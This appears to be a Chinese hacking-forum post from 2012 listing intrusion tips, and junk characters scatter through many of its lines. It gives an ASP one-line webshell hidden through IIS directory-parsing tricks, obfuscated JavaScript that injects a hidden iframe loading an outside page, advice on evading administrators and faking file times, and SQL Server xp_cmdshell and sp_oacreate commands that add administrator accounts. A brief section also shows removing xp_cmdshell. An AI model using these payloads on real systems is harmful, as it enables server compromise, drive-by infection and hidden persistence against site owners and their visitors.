- e9 l0 U+ ?# Q, w8 f% R/ @- S% ?, t( O
53、隐藏ASP后门的两种方法6 D3 M& ^9 j+ O9 B
1、建立非标准目录:mkdir images..\, D' V y: s- L: Y) O8 X. @/ \8 m
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp* t+ x6 D$ b3 }2 }- g7 R
通过web访问ASP木马:http://ip/images../news.asp?action=login
( ~: x2 l) K- `% F* S6 a$ v如何删除非标准目录:rmdir images..\ /s
4 q( z7 n( F' i8 h% K( o/ ? S2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:1 S( ?5 f: k9 O( H" A5 W
mkdir programme.asp1 A0 e3 A; u' f0 r! q
新建1.txt文件内容:<!--#include file=”12.jpg”-->6 y) K$ ` O: m
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
4 b4 ?. _7 b. m3 _7 ?6 l# x: mattrib +H +S programme.asp
" d6 t+ E p( g( Q% E通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt2 a {- Y$ [" v+ H6 n
' k' G$ E9 Q" {0 f& O! D54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
; g5 C- w4 m) r" Q然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
+ o9 E: W: s8 x- `1 U' T" e
& I1 S' F8 V) N4 k- i* B( H55、JS隐蔽挂马- a0 i4 C6 G7 r. ~0 N$ w
1.5 U9 Y# z! K3 F$ t* }( e% S
var tr4c3="<iframe src=ht";
* m5 K2 u* X. [, d) w& @8 \* Ntr4c3 = tr4c3+"tp:/";
y6 ^3 m# A) O$ Q( W' qtr4c3 = tr4c3+"/ww";
; l5 f' u, c l, ptr4c3 = tr4c3+"w.tr4";0 u- i0 b. c4 s) b
tr4c3 = tr4c3+"c3.com/inc/m";! a6 N, m5 Z+ ]& t$ }& Z: e
tr4c3 = tr4c3+"m.htm style="display:none"></i";
; G6 i; [/ n& `/ ^ H# P# Btr4c3 =tr4c3+"frame>'";
* j" [# h& q, adocument.write(tr4c3);
/ |; B \5 {+ z q# p) f- F5 t/ m避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。) v& M- `9 W' \" Q
. f, x6 l# s' q* k- c" f5 r+ N9 d
2.
! u( Y' Z( m- J: ^& j0 i) H$ m4 p转换进制,然后用EVAL执行。如) L7 ~1 V# |6 x, g/ q) {& d& G% A
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");$ |% G& Q5 E- d+ [. h1 h
不过这个有点显眼。
( l$ h/ e. W9 R. J& r/ m8 H3 e8 j3.
4 n0 S) q D. r( Bdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');& [9 b' W, c/ X) `, Q
最后一点,别忘了把文件的时间也修改下。
% N. B) y1 U7 l" L1 u3 a7 Y5 w/ j- C5 h/ N! g! G! Q
56.3389终端入侵常用DOS命令 j' C2 E+ O* a u6 E3 ~5 B! ^
taskkill taskkill /PID 1248 /t7 R# D7 \) e. u' A% |
& F5 i5 Y3 H# k" Btasklist 查进程/ N3 j4 z# A4 N0 z; K' f9 L
% }& |; a( j" u0 p" h
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限3 Q+ i* i0 @/ n( X( m& X
iisreset /reboot
4 `3 C* `4 A0 [8 O4 T. y- Jtsshutdn /reboot /delay:1 重起服务器
2 [0 ?3 X) T1 s2 H. ^
- W. F% a9 F( E9 j5 ?' }8 Q3 qlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
& G- g# V7 V! O( f8 Y. ?5 D% U. T& i6 q8 |
query user 查看当前终端用户在线情况
: M- C s& o" P7 ]+ z* v G% k' @" G* |
要显示有关所有会话使用的进程的信息,请键入:query process *
7 I @2 H# i' Y" [2 B8 h. Y r
* H1 b) ` k5 j7 m. \要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
! u; r5 k6 o) ]- [# ]- @3 x' r1 A& i x* T, }9 }
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
: e% R- |% ? o
- ] P* Q! M' X. i要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
! U+ ~1 ^- i9 u) y0 i# x
3 m3 Y6 e2 c: j命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
5 |7 h5 t6 k: @ \& D! n6 m6 M2 f+ Z( w( R/ l1 o
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
: ^! W& K4 T% z9 o4 k8 i3 B: @$ l6 z3 D8 ^+ H
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。- \. h' t8 F" W; [* E
& m" D0 B- A2 q命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机; s. N! x) m7 {, A* ^
& W: z9 o1 Q" e( O" M; Q) N7 n56、在地址栏或按Ctrl+O,输入:5 k+ K- i7 B0 C8 T, V& f$ S( H( [ V
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;! T' C3 ?& Z( c9 J+ v Y1 u
* b* L$ X/ v9 ~6 _源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。" a! _* G" `0 M5 ?! Y
; b$ a' |# @( ]* _+ T/ G! f
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,& V* u3 ^, u" h1 |' {3 L* k
用net localgroup administrators是可以看到管理组下,加了$的用户的。: G7 U$ n* P; i+ e4 F0 E0 O7 K
- V- S% ` W" M, S- Z3 k& D0 c0 }& Y58、 sa弱口令相关命令
, M% b6 y; ~; H& W0 L& h( s6 ^$ {! q! o/ I& U
一.更改sa口令方法:
# d: |2 i1 l% w用sql综合利用工具连接后,执行命令:( f/ Z t7 R- e2 I
exec sp_password NULL,'20001001','sa'! Q: d; t5 {7 [, U$ F
(提示:慎用!)* u2 S( ~' p; @5 a
# q6 p' {, A k( L+ L
二.简单修补sa弱口令.
6 E9 z' s$ R% P+ u' z9 n! `+ w
% P# F7 C& s8 a方法1:查询分离器连接后执行:3 X! g0 q, L% W- n& i: r
if exists (select * from8 H+ E1 \9 F+ b4 H+ O- d
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and+ N0 ]; q9 k) d7 \
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
0 F9 q, @9 l4 D* c% Y; P% u; U3 n3 p, C- s
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'" l8 ^ i5 a9 N- C4 ~% Q
1 }, M! p! H$ t! c
GO$ K5 Z4 k) f' ~" m/ A) x
& T3 h1 p4 u6 I. ~3 \; E7 u; D
然后按F5键命令执行完毕
/ P! E! p0 q: z/ U, U5 L) K2 N, [7 E! ~& A! b
方法2:查询分离器连接后" A" L& N1 K- V6 h6 `
第一步执行:use master0 n) t* S+ W% K% e
第二步执行:sp_dropextendedproc 'xp_cmdshell'
3 K- s0 m) R- V) R' {然后按F5键命令执行完毕
: x, }: G `% B; Y' S. `2 t1 \
4 l* L& J P6 r, S( M/ j% }- D. P) N9 |+ W0 P) {; C
三.常见情况恢复执行xp_cmdshell.1 M* y+ r4 a# D
0 U1 T8 B5 y5 K7 F- B- V# x
3 Q% u4 \& a+ Y
1 未能找到存储过程'master..xpcmdshell'." {( A' h3 D. D* ^) r
恢复方法:查询分离器连接后,, O: ]* Y; H0 H# u2 W* H
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int' y3 l. m8 m S1 G; H- n
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
) h( A+ g. o% J5 x+ r; M然后按F5键命令执行完毕
e( J. X: j, [* J& P3 O+ L8 z' }% F" ]. R7 T. z% @+ W
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
3 _! a8 c9 Q0 p* b: k# \恢复方法:查询分离器连接后,
2 y2 P: r% ^) E$ V- Y* W第一步执行:sp_dropextendedproc "xp_cmdshell"
" C# c* E0 D! d/ \' a9 M9 w第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'; u& c; }: r2 B8 b$ L
然后按F5键命令执行完毕
! a# C6 L5 ]$ g# |6 k" U
0 a! R6 F. L# j+ a+ Q* D+ N4 u+ L$ i3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)# ~3 C% `9 Y8 R9 n& R
恢复方法:查询分离器连接后,5 z8 Y2 ~- M' R
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
/ R$ O( I2 g7 D* p6 D1 l第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 1 k$ L+ u n, g2 w
然后按F5键命令执行完毕
# e3 }7 p; W# b, m: |3 i+ s R E) \( _) k& R* u: ?
四.终极方法.
) ]& H5 k E H, ~2 T6 p如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
5 k; p: }* g& ~查询分离器连接后,
& h! s& K; O% E" G) s# R0 }2000servser系统:2 u; @" p2 y0 |3 ~
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
& }" t! S! P8 y0 z6 x
3 u' L$ E% [, ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
* R5 n1 P* I2 B! j- k( f! B
0 K7 l7 B: V# s m# a4 N4 dxp或2003server系统:' K/ h6 E1 O# E2 R+ e7 q2 L
( L& d% p ]2 Y: Y/ R3 K6 n
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'0 |' Y: N- T6 z8 @7 S2 `$ z5 i, m
% U- ? k/ h/ r+ r6 q, n Z! Tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
6 s7 k8 w. V* I2 q& Y( w0 t) H7 u |
发表于 2012-9-15 14:51:03
收藏
支持
反对